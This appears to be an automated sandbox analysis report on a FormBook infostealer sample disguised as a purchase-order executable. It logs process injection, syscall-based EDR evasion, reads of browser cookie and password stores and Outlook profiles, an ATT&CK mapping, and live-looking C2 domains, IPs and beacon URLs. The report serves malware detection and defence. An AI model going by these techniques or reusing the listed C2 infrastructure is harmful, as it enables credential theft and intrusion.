                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 2836Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\PO 4110007694.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B1D008Jump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C687B1 LogonUserW,0_2_00C687B1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C148D7
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C74C53 mouse_event,0_2_00C74C53
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 4110007694.exe"Jump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C67CAF
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C6874B
                Source: PO 4110007694.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: PO 4110007694.exe, hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3862B cpuid 0_2_00C3862B
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C44E87
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C51E06 GetUserNameW,0_2_00C51E06
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C43F3A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: PO 4110007694.exeBinary or memory string: WIN_81
                Source: PO 4110007694.exeBinary or memory string: WIN_XP
                Source: PO 4110007694.exeBinary or memory string: WIN_XPe
                Source: PO 4110007694.exeBinary or memory string: WIN_VISTA
                Source: PO 4110007694.exeBinary or memory string: WIN_7
                Source: PO 4110007694.exeBinary or memory string: WIN_8
                Source: PO 4110007694.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00C86283
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C86747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568199 Sample: PO 4110007694.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 28 www.soainsaat.xyz 2->28 30 www.duwixushx.xyz 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 6 other signatures 2->50 10 PO 4110007694.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 hLRGQqcplWvpUw.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 bitsadmin.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 hLRGQqcplWvpUw.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.duwixushx.xyz 156.251.17.224, 50045, 50046, 50047 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->34 36 www.7vh2wy.top 20.2.249.7, 50041, 50042, 50043 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO 4110007694.exe39%ReversingLabsWin32.Trojan.AutoitInject
                PO 4110007694.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.t91rl7.pro/jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://www.yvcp3.info/x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW0%Avira URL Cloudsafe
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/100%Avira URL Cloudmalware
                http://www.rafconstrutora.online/1jao/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW100%Avira URL Cloudmalware
                http://www.yvcp3.info0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/q0vk/100%Avira URL Cloudmalware
                http://www.nb-shenshi.buzz/xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW0%Avira URL Cloudsafe
                http://www.7vh2wy.top/n7xy/0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o=0%Avira URL Cloudsafe
                http://www.7vh2wy.top/n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW0%Avira URL Cloudsafe
                http://www.learnwithus.site/alu5/0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8=0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3100%Avira URL Cloudmalware
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/100%Avira URL Cloudmalware
                http://www.yvcp3.info/x20l/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vayui.top
                		104.21.95.160
                		truefalse
                  		high
                  www.amayavp.xyz
                  		185.27.134.144
                  		truefalse
                    		high
                    www.7vh2wy.top
                    		20.2.249.7
                    		truetrue
